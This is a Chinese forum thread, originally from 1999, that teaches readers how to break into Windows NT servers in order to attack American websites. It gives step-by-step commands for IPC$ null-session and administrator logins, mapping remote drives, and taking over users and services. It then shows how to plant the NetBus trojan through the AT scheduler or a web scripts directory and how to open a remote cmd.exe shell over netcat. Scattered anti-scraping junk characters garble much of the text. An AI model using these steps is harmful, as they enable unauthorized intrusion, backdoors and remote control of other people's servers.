找回密码
 注册

QQ登录

只需一步,快速开始

关于“怎样进入NT主机”的几点补充

[复制链接]
发表于 2011-1-13 17:03:28 | 显示全部楼层 |阅读模式
《版主页黑客工具和文章的几个问题》中提到:
3 n- O) J# \& `5 r: q2 _/ ]# o请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。% r0 |2 N4 U5 z
> 我的机子MMX166,WIN98,2。5G,32M内存。
& x0 S6 R4 g* c- W  ]- x3 A8 v5 Y. w# b8 {" n3 M
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
/ I+ U0 J" G' E$ r7 {- V: v8 a, z0 V你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。
6 i) {5 r5 x. Q! \/ g) a其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:1 V; S& g- o, N3 l; k
net use \\111.111.111.111\ipc$ "" /user:""
8 g' E% B& X' ^% ~2 T, Lnet.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:# j  _/ R- z# @$ Y: {8 z
net view \\111.111.111.111
9 Q9 b$ ~, l2 r% ~/ x' z( W当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
6 X/ f7 [9 U, y1 @/ mnet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
0 G! W) Y% t- R( P0 [命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:. H( B1 f  i/ j+ k7 {+ g1 n9 [. v
1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:2 _, S2 c5 B5 P
net use x: \\111.111.111.111\c$  ]; Z& M3 Y4 f/ I1 G
net use y: \\111.111.111.111\d$
' e: Z  ?  _5 s& p+ U1 i这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以.../ V+ p0 P5 }1 I0 Z
2、管理目标NT的用户:3 z) H) R& R) a# c: t8 `
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”5 t2 {0 `4 N% @/ \
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样. }( d) B" M' k: u  l
3、管理目标NT的服务
2 g1 u2 r8 P' M) @, b选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”4 u" X" o& s" U; z. a2 f
这样你可以管理目标NT上的服务,共享目录2 l) V) Z8 \. p! g, B
4、IIS管理
5 i  ~/ D& e6 |4 `; i0 \  f# C选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.1114 P* @; T) W6 I" J& }5 g$ L" L. B
目标NT的FTP、WWW服务你就可以重新配置
+ s6 F- s5 [4 t. k  C, S3 {' @5、事件管理
" S1 s5 s. u6 G: `( |$ T7 Q( ^1 K% Z“事件查看器”->连接到服务器->111.111.111.111
% T$ ~& ?: M$ J7 T" J% z! I; q6 l- Z) ?  i
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。. x8 G- `) o. Q1 t, w2 \
+ i7 q1 N7 r) u9 L$ K- O
当然,98,95也能做一些事情,但很麻烦,比如:
0 a: f- `' _; P, Q2 r% bnet use \\111.111.111.111\ipc$
  C( G8 |9 r% a; u% _0 H+ onet use z: \\111.111.111.111\d$9 ^  `; f  ~4 w8 Y
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
$ c1 i8 T; ?7 ]) X" F& M3 o8 A
& n4 \# Y. d6 O, Q! |2 Q我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!
& n4 @& F. Q) [- I( O' _这样,你还可以了解目标机器上能有什么东东供你去用!  j, d' p! O9 X; n! [2 n( l8 w

- }' Z& o" ~1 @+ @: O, Y& m1 l. _; C! Y: ~: c6 k- a+ d
--------------------------------------------------------------------------------0 O1 w  g) ]5 |
/ S5 G8 d. l) r
>quack于1999-06-12,23:37:440 S" J  Q4 T' ]# e8 ?& P* ]( H) f
在大作《几个有关黑的问题》中提到:
1 t9 u& D7 [* h0 X9 g; V/ F首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。) Z$ B# M) N- ]6 S+ E

2 G# c; O8 c  U% z# wkillusa于1999-06-13,03:25:15
1 |+ b1 l- Z; |+ l4 n在大作《Re: 几个有关黑的问题》中提到:
: G8 I) M6 E+ X0 n. C3 h. p/ y
( v. W' l' y! P( o) Z3 gletmein.exe 暂时没有mypwd参数,十分抱歉
. a- A' z% d% _& ^( c4 c) vpinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。
, y: c% G; N) @4 t5 `' S
$ q7 b1 q+ u& _+ q! X# g" xNetbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的
+ ]# D$ S" X& }  `$ c4 ^& H. O. @服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:
; O: i- \$ U& d% z! m+ c# Q8 V$ S/ L4 u* q7 x
1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:6 A% L& ?: j0 X* |

7 z6 f8 g& G. [C:\>net start schedule
( Y  J$ v( w0 m4 _/ Q( i, B! ]2 @9 GSchedule 正在启动服务.....
  Q1 ?/ s/ x/ J. ^% sSchedulw 服务启动成功。
7 I1 q2 {/ O- M" N; ^C:\>at /?
. z9 f8 c$ v1 ~AT 命令排定在特定的日期和时间运行某些命令和程序。
+ f) U6 I$ v) t- P1 Q7 q6 [& O运行 AT 命令之前必须先启动 Schedule 服务。2 L" U! w( J- I, i

' ?& [% u" v4 M5 dAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
; Z! `/ v& C7 {5 q4 _% _0 O0 j9 fAT [\\computername] time [/INTERACTIVE]% t8 h8 e5 ^/ R- e+ D
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"; N: x! x) n& g. ?3 j( U) `

) _( ~; G3 m! J! ?# a! V\\computername 指定远程计算机。 如果省略这个参数3 }- q' ~7 o7 T& ]; a0 t
命令会被排定在本机上运行。
. N( n+ e- Q; ~5 Z( K; y7 Bid 指定给排定进度命令的识别号。
3 {5 ^# H7 Y8 ]# Y, ?' i7 S% Z$ P0 e/ w2 z3 Z$ @& K9 W
/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。
! s$ @3 B7 y! a* I9 e/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
6 c4 e5 o+ v4 z- Ntime 指定命令运行的时间。
2 q7 {: I# C  M" ]0 Q/interactive 允许作业在运行时,与用户通过桌面交互。
( o0 T0 U! Z) a: j) P0 X8 e' s3 h! I
( }2 {  a* e" t$ e1 p3 y- J/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
. C' H8 x  ^/ T) Z# g" b) a. \如果省略日期,则默认为在每月的本日运行。
' X2 c3 f; r$ E, D( G# Y. P0 m4 `7 `% e5 @2 H1 J1 M
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。" {% H7 b* |* _7 l

( R+ X/ W$ `; k( B+ J" a% Q4 p# H1 O" U"command" 准备运行的 Windows NT 命令或批处理文件。
! a  _4 ^5 C1 }$ {: C- T0 O: \  S7 r1 i5 l. J8 A  \# o' F
C:\>
% b; u& @- m& a  N4 D8 L' U) s
) x& M$ n7 Y5 q- h$ t: q8 u: G( Y知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:8 p7 e* Z* P/ n7 m# y2 G
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser": H- E) F& \2 {  m- f. @
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start2 w7 l/ o& t0 H1 p1 }6 E& T
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
# p+ K# X1 j. r5 W( [at \\x.x.x.x 00:00 ntsrv.exe /port:64321) W8 s2 O7 w+ ^0 w' G0 V3 U
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:) d& q8 X  o2 k/ f
Microsoft(R) Windows NT(TM)
9 a5 t9 N9 h; A! G% }(C) Copyright 1985-1996 Microsoft Corp.( ]! J! J3 I' H4 u" @
C:\>" t3 K4 P! U2 x) \* E- J3 s
1 x7 Z% N6 I! c+ a& x* j
2、利用web启动ntsrv.exe或其他程序在目的服务器4 }9 B# M5 b4 s# C: k
$ |( k5 o' S% I7 u8 Y6 Q6 T0 }0 t) K
将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
2 M2 Y' a6 Y9 G: C! Qhttp://x.x.x.x/scripts/ntsrv.exe /port:64321
3 y$ P5 Z* S% u0 P+ |% @0 i: Shttp://x.x.x.x/cgi-gin/ntsrv.exe /port:643215 \; Q. f- M0 `
该程序就启动了
6 z" N" X' ?+ I" E  B& R
# K. s/ V0 l2 D" _8 Q; a我只提这几中方法!" ?3 [- x) b: Q# P: A6 ]
要成功,必须打好基础工,对操作系统充分了解!
' ?! L8 o# x5 e4 m" t4 n8 v; z( F# M6 O6 l: L  {
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-3-16 14:51

Powered by Discuz! X3.5

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表